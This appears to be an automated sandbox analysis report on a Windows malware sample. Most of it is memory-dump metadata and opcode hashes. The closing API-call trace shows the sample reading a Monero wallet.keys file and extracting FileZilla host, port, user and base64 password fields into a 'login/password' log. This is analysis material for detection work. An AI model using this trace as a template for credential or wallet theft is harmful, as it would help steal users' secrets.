                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                    • Instruction ID: 99571b8d96b74c8a12ed1ecca8c6625de2c75f9e337e3a5cce76678a73d90385
                                    • Opcode Fuzzy Hash: 3eef1e962a967877f690fd1f0771a4888f871654011a44f32db8c5da590453c7
                                    • Instruction Fuzzy Hash: CAB18272A083115BD308CF25C89175BF7E2EFC8310F5AC93EF8A997291D774D9459A82
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                    • Instruction ID: a5cf1b5ed37e28f2f7879679e1c2ee488a14524f395a1d7771ee961f1096b2fa
                                    • Opcode Fuzzy Hash: b45fc63482d79cc2aae5e10512ac15601b0a17f4a90d9da2a62a44701229dd2a
                                    • Instruction Fuzzy Hash: E8B10871A097118FD706EE3EC491219F7E1AFE6280F51C72EE895B7662EB31E881C740
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                    • Instruction ID: 56d399e9a2cd7d890431457cbbfbeded68f42b198692fc719ff06cf80bf63437
                                    • Opcode Fuzzy Hash: bb6f10109d0581baf61123a75d63749a60e7782e9e4edcd8e553ab559d16045c
                                    • Instruction Fuzzy Hash: 7891F671E002118BDF24CEA8DC82BBAB7A0BF55310F994564FD55AB382D372DE46C7A1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                    • Instruction ID: 90fa7cbb2bfe43ef9f260d1ce49a6d3b518b8236fce2ffcf611c6e42454110cd
                                    • Opcode Fuzzy Hash: 16bdfb74a68fea5596375bda6d5785df31f799f6869f10e6a07fb8ee45265206
                                    • Instruction Fuzzy Hash: 4BB14B39510609DFD715CF28C486B647BA0FF45366F29869CE8A9CF2A2C335DA85CB44
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                    • Instruction ID: 3944c6f783b79ae41fbdd77ff4e26987e5bad3deb57ed09a325484fb2ccaf34d
                                    • Opcode Fuzzy Hash: d866642f9a93dc2b485e42e03c656f9322f63f44223d3d2ee63313605b41ce60
                                    • Instruction Fuzzy Hash: 64C14A75A0471A8FC715DF28C08045AB7F2FF88350F258A6DE8999B721D731E996CF81
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                    • Instruction ID: 02fca7561febcd170fc9d3c9fd10503f19ae39a4bf8069977ff09e541a6f3eda
                                    • Opcode Fuzzy Hash: 12508c5a3310843c85f9c5ddeebf37d3648447172f16da2f5b89db676fd65877
                                    • Instruction Fuzzy Hash: DE9188308387906AEB128B3CDC427BAB764FFE2350F14C31AF999724A1FB7196858345
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                    • Instruction ID: 89c16210fdf9856c702fb836d2f55b14ea65f3fe967b7505ba96668026c2f6f1
                                    • Opcode Fuzzy Hash: 23b87471342f6f1c58ea4892999818a4d704ced4d641009a5909c51f93f051e8
                                    • Instruction Fuzzy Hash: 7FA14072A10A19CBEB19CF55CCD1A9EBBB0FB54324F15C62AD41AE73A0D334AA40CF50
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • Opcode ID: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                    • Instruction ID: 6e7d8f68caedd253f817177854b2d4c97e8b761660941367561cc982d5bb4b05
                                    • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                                    • Instruction Fuzzy Hash: 44A16E72E083119BD308CF25C89075BF7E2EFC8710F5ACA3DA8A997254D774E9419B82
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • Opcode ID: 10d4cf56bea0797d4aec6a1af681cbf56fa9c5cfffc50105e8fe7791180b9b9b
                                    • Instruction ID: a3f787373e316090c6f98fe6b9df12e8bd387554914fede94287079e784b3fca
                                    • Opcode Fuzzy Hash: 10d4cf56bea0797d4aec6a1af681cbf56fa9c5cfffc50105e8fe7791180b9b9b
                                    • Instruction Fuzzy Hash: 115148B390C600DBD304AA2DDD5667EBBE5BB58250F1A453DDBCA53B84EA31181187C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • Opcode ID: cd14e7ef3471dc4c611529113a6ff1e53a282c3ee8c4df59ed467dc7fc0ded89
                                    • Instruction ID: 57335410b2cf189bb99d21100707eba509ddd9034c8fd038c23dd263980d5fc8
                                    • Opcode Fuzzy Hash: cd14e7ef3471dc4c611529113a6ff1e53a282c3ee8c4df59ed467dc7fc0ded89
                                    • Instruction Fuzzy Hash: 2D5154F650C304EFD3146E2ADC4963EFBE9FBA4610F06492EE7C256740EA319A50C687
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • Opcode ID: 17b5adf1cf19df39082a862a5847fef9a8ef642db6d9657f468fb688f7d16335
                                    • Instruction ID: c22fc12bdc8309b0607801aad9506361f02204326ad90db1cb7ee07ead22113b
                                    • Opcode Fuzzy Hash: 17b5adf1cf19df39082a862a5847fef9a8ef642db6d9657f468fb688f7d16335
                                    • Instruction Fuzzy Hash: FC51E4F391C6109FE304AE29DC8537AF7E5EBD4760F1A893DE5D4C7284E63448458B86
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • Opcode ID: 897a37372dca8584ee51da608e20a621613b3eb923240a5f6fedd954b8ddc366
                                    • Instruction ID: f0cffa5f384e57ed3c2c2f2731e21a770761a75377e359031c690c4b91dfa07b
                                    • Opcode Fuzzy Hash: 897a37372dca8584ee51da608e20a621613b3eb923240a5f6fedd954b8ddc366
                                    • Instruction Fuzzy Hash: 3E4124F3E182144BF7045D39EC9436AB6D6DBC4320F1E8A3DDE88D7789E9395D058286
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                    • Instruction ID: 87ea24f2df3c2c911bf17b1d3ec57fe410225b96b0be01817ed263e765141820
                                    • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                    • Instruction Fuzzy Hash: 59514C62E09BD985C7058B7544502EEBFB22FE6214F1E829EC4981F383C3759689D3E6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • Opcode ID: e2298d82167e9696b4cca379abe3d4833d41840512288587dd02d8d1113a7ccb
                                    • Instruction ID: f334f984b313f7afbf8960865ceff805515da7e11c752afd0d8f355cbddd39b7
                                    • Opcode Fuzzy Hash: e2298d82167e9696b4cca379abe3d4833d41840512288587dd02d8d1113a7ccb
                                    • Instruction Fuzzy Hash: 0B3168F3F186145BF3088629EC41726B6D6DBD4720F2AC63EEA49CB380F9788C018191
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • Opcode ID: 1ab0795aea30c523bac044b2ef650ce03f6c9bd09d3d6b87d48697f7c120075c
                                    • Instruction ID: 273f811dfd5fe060883a2a315c051efcf194b3eb18471f1528e4b1d81199db1c
                                    • Opcode Fuzzy Hash: 1ab0795aea30c523bac044b2ef650ce03f6c9bd09d3d6b87d48697f7c120075c
                                    • Instruction Fuzzy Hash: 4A3105B210C7049FE345BF28D882ABEFBE5EF98311F06492DE6D582650DA31A4448B97
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                    • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                                    • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                                    • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BE8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BE8F9B
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BDA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BDA13C
                                      • Part of subcall function 00BDA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BDA161
                                      • Part of subcall function 00BDA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BDA181
                                      • Part of subcall function 00BDA110: ReadFile.KERNEL32(000000FF,?,00000000,00BD148F,00000000), ref: 00BDA1AA
                                      • Part of subcall function 00BDA110: LocalFree.KERNEL32(00BD148F), ref: 00BDA1E0
                                      • Part of subcall function 00BDA110: CloseHandle.KERNEL32(000000FF), ref: 00BDA1EA
                                      • Part of subcall function 00BE8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BE8FE2
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00BF0DBF,00BF0DBE,00BF0DBB,00BF0DBA), ref: 00BE04C2
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BE04C9
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00BE04E5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BF0DB7), ref: 00BE04F3
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 00BE052F
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BF0DB7), ref: 00BE053D
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00BE0579
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BF0DB7), ref: 00BE0587
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00BE05C3
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BF0DB7), ref: 00BE05D5
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BF0DB7), ref: 00BE0662
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BF0DB7), ref: 00BE067A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BF0DB7), ref: 00BE0692
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BF0DB7), ref: 00BE06AA
                                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00BE06C2
                                    • lstrcat.KERNEL32(?,profile: null), ref: 00BE06D1
                                    • lstrcat.KERNEL32(?,url: ), ref: 00BE06E0
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE06F3
                                    • lstrcat.KERNEL32(?,00BF1770), ref: 00BE0702
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE0715
                                    • lstrcat.KERNEL32(?,00BF1774), ref: 00BE0724
                                    • lstrcat.KERNEL32(?,login: ), ref: 00BE0733
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE0746
                                    • lstrcat.KERNEL32(?,00BF1780), ref: 00BE0755
                                    • lstrcat.KERNEL32(?,password: ), ref: 00BE0764
                                    • lstrcat.KERNEL32(?,00000000), ref: 00BE0777
                                    • lstrcat.KERNEL32(?,00BF1790), ref: 00BE0786
                                    • lstrcat.KERNEL32(?,00BF1794), ref: 00BE0795
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BF0DB7), ref: 00BE07EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
